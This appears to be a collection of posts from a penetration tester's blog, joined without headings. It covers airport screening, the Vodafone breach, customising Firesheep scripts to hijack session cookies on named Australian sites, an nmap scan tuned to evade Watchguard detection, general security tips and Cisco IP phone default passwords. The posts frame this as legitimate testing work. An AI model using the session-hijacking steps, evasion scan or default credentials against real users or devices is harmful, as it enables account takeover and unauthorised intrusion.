The sad thing is that the front line staff have become so drummed into finding nail files, and scissors they can't see the real threats. As a IT security professional I travel with an assortment of unusual items to perform penetration testing, and when required for physical/social engineering jobs this includes lock picks, Access card cloning tools etc. (At AusCERT we ran a social engineering tutorial and as part of that we had a hands on class for proximity card cloning as well as lock picking to illustrate points as part of the class).

Recently due to a last minute change at the airport when coming back from AusCERT I had to carry on a bag that I had not planned too.

So when I got to security and I had to remove my laptop, I looked down and thought this is not going to go well. As my bag went through the xray machine this is a sample of some of the lock pick gear they would have seen in it.

The funny part is that they asked me if I had a nail file in there. I opened my bag ready to explain the reason behind these items. Well they picked out one item that resembled a nail file put it in it's own tray put it though the metal detector and the thought of loosing my nail file collection (aka the "toool" credit card size lock pick kit) was not pleasant but better than loosing everything.

They then said yep that was it and promptly gave it back to my honest shock.

You just can't make up theatre this good.

Rather than help work out what is setting it off they prefer to just make me sign a form. I told them this is the second time in 3 weeks.

They demanded to see my boarding pass I explained I was using the new virgin mobile boarding pass and showed them a 3d barcode.

Next at the gate after scanning the boarding pass on my mobile the person at the gate waved me on. At the plane I showed them the 3D barcode and the guy could not compute he demanded my phone to run back and validate my boarding pass I refused and he broke.

I told what seat I was and that he could visit me if there was a problem. This allowed me on to the plane without validation (a trivial control but the airports none the less). As they have to validate all who enter the plane or can not take off.

The virgin app isn't even that good. As it looses all the flight data if you navigate away. (pro tip screenshot it on your mobile device). At least the URL to navigate to the boarding pass looked encrypted.

1.  Why was something that access the most sensitive data of it's customers not protected with a two factor authentication mechanism.
2. What controls does Vodafone use to catch users attempting to capture large batches of users via searches (i.e  Search a then b or account no. 123 then 124etc.)
3. Did they not perform analysis on the patterns of login to IP address to possibly identify unusual behaviour? ie. Login account "ben" has logged in from 20 IP Addresses in the last month. 
4. Why did they not do simple controls such as locking logins to specific IP addresses as a low ball security control.
5. Who are there auditors and why did they not raise such a potential high risk problem?

 I very much doubt that we will ever know the true dataloss that has occurred over the years at Vodafone. And what of the other telcos ? Think they are doing something better perhaps but I wouldn't put money on it.

Lets hope the NSW Privacy Commissioner actually does something with this event and takes action.

A lot has been written about Firesheep and whilst I have provided some commentary on it myself. There wasn't much mentioned on that it relies on specific scripts tailored for the site's in which it targets. Curious I had a quick play and wrote up a couple of scripts for some Australian Sites I have used.

NB:All of the ones I tested used HTTP for the sign in process which was the default setting, Some offered HTTPS but as an additional link to click.

It's a pretty straight forward process;

1) Identify the correct domain 

2) List the cookies sent as part of the session (Normally the ones sent to you after you have authenticated)

3) Identify the section of the page in which the user name is displayed

4) modify the (identifyUser: function). For the sites I looked at it meant I had to change "this.userName   = resp.body.querySelector('changeme').innerHTML;

The changeme value above has to reference where the username value is. So for Whirlpool for example the page source snippet looks like this;

The username is referenced as the following within the script;  

this.userName = resp.body.querySelector('dl.userinfo span').innerHTML; 

One thing I did notice when running Firesheep was the number of third party connectors that sites were running. As these were linked from the news site I was viewing they automatically connected back over HTTP to the service.

In one example it had a bit.ly bookmark extension and a facebook connector. If you had an open session in another window or opted to keep yourself logged in by checking a box (which I guess many users might do) it would connect back and expose the session cookies and hence appear in Firesheep.

 I don't condone illegal activity and have provided the above information for people to evaluate their own applications or the applications they legitimately have access to. 

The following firesheep scripts were written with help from RD (Thanks Mate).

Whirlpool Optus Seek

But then after seeing that I finally look up and see that we were overtaking this ;-)

• Passwords
  • Weak password selection by users is still the most common way to compromise and organisation. Choose a phrase and use the first letter from each word as your password. And add symbol at the end i.e @yourpasswordvaluehere!

• Protecting your system from Malware;
  • There are several good solutions some are even free my preferences are my pick of the free is AVG offering.
  • The commercial offerings are always battling it out it the reviews and some shine above others. Sophos is something I often see in the field doing a good job IMHO.
  • When selecting an antivirus or these days malware protection look for something that protects all of your online activity  (Email, Web Browsing and Social Media)

• Patch your software;
  • Windows users are often compromised due to lack of updating your software. The windows OS makes use of the built in software update process which should be set to Automatic.
  • Third party software also needs to be regularly updated not sure if your it's up to date? Try using a free online tool from Secunia to check if there are any vulnerabilities for the software on your machine.

• Data Encryption
  • Windows Encryption tools are very effective against casual attackers. There has been encryption in windows for many years all seamless to the enduser. Windows 7 and Vista have the Bitlocker tool which is simple to very simple to enable.

• Firewalls
  • Are you concerned you might have some services exposed to the internet perform a quick free scan at the Shields up website and discover which ports are open.
  • If your organisation is starting to look at something more than just a ADSL modem between you and the internet or you need more control on activities your employees are performing online then an entry level firewall will assist. They often do many if not all of the tasks of the corporate big boys without the need for costly staff or $$$. My recommendation for ease of use and features is the Watchguard range of systems.

• Online/Social Media
  • The benefits of using facebook, myspace, linkedin and other social media sites to promote your business or catch up with friends and family is wonderful. But as online criminals increase there attack vectors be conscious of what you post online. My advice is don't post anything online that you are not prepared to pin to your letter box at the front of you house.

• Outsource
  • If you are about to set up online but don't have the time or money to buy the right equipment or hire staff of consultants (Like myself). Consider looking at Rackspace who provide online virtual servers which you can get full access to and consult there excellent support staff.

When you are performing an infrastructure penetration testing its important to get good reliable port scans. So often we ask customers to turn it off to ensure we capture every open port as often we don't have the luxury of time to allow us to run slow scans to bypass the detection rules. As clients who run Watchguard only have the option of on or off it will most often remain enabled and force the tester to do a slow scan.

After playing with a few different timings to get the best result I found against the default Watchguard settings was the following nmap command to get them done the quickest but without getting my IP blacklisted.

nmap -sS -iL targetlist.txt -P0 -sV -T2

When done with a full port range (-p1-65535) on four IP's it takes 1000 seconds to complete. The -T2 option is the time setting, T1 is the slowest.

(March 2010 - updated due to change in Watchguard default settings)

Marcus believes that tools such as CORE Impact and Metasploit are not a good idea as it makes a pen tester lazy (If I could generalise his comments to mean that). The things were left out which are an argument as to why tools such as the above are needed and why pen testing is still a valuable exercise are illustrated by the following points;

1. A pen test is not just exploitation of devices ! A pen test is about using the technical access you gain to gather business sensitive information to highlight the risk of weak IT Security controls. It's not about just getting the access !!!! Whilst the tech's in the target organisation understand the impact. It's about highlighting the business impact should someone malicious exploit the same vulnerability and attempt to extract sensitive business information or disrupt operations, this is what senior management are interested in.

2. The tools that assist a penetration tester such as CORE Impact and Metasploit are only as good as the person driving them. CORE Impact whilst having a automated wizard is handy but the manual process is required to get complete coverage. The reason customers like this tool being used is that it has great logging and reporting of all actions taken. Also as a tester when you are finished all you have to do is select cleanup and it removes all the agents (control modules you have installed whilst you have been exploiting systems). Once again great to show compromised hosts but unless you link these to business risk it's not that good for the customer. (Disclosure: Pure Hacking are re-sellers for CORE Impact)

3. Coverage - The old problem with any consulting job is time and with a pen test time is always limited. Customers might not want to dedicate much time to the assessment but still expect a tester to find all the holes ! That is obviously a tough job, with scanning tools at least you get coverage of the target environment and whilst it's working away you focus on the other manual tasks of the test.

4. The win or Loose scenario for a pen testers. This is not something we are too concerned about it's great to compromise a customer network and illustrate a security attack vector that they had not though of. But we still get paid even if we don't find any security weaknesses. In saying that however there are always security controls that can be strengthened to help reduce the risk a environment is exposed to.

5. Secondly both tools have very limited Web Application security support and the shift to Web Application security testing has been very significant in the last 3 years. Most pen testing I perform (70%) is now on Web Applications.

Happy to hear constructive thoughts on my post.

Passwords for the Cisco IP Phone 7936;

User Level Access @ Web interface: 7936

Admin Level Access @ Web Interface:**#

No actual username is required ! and after doing a bit of research it turns out if you change the accounts the rightful owner has no mechanism to change them back. If you thought a re-flash might be the answer the device requires administrator access to perform that function! So there is no mechanism to reset to factory defaults without admin access! There are a few stories of bricked phones as a result !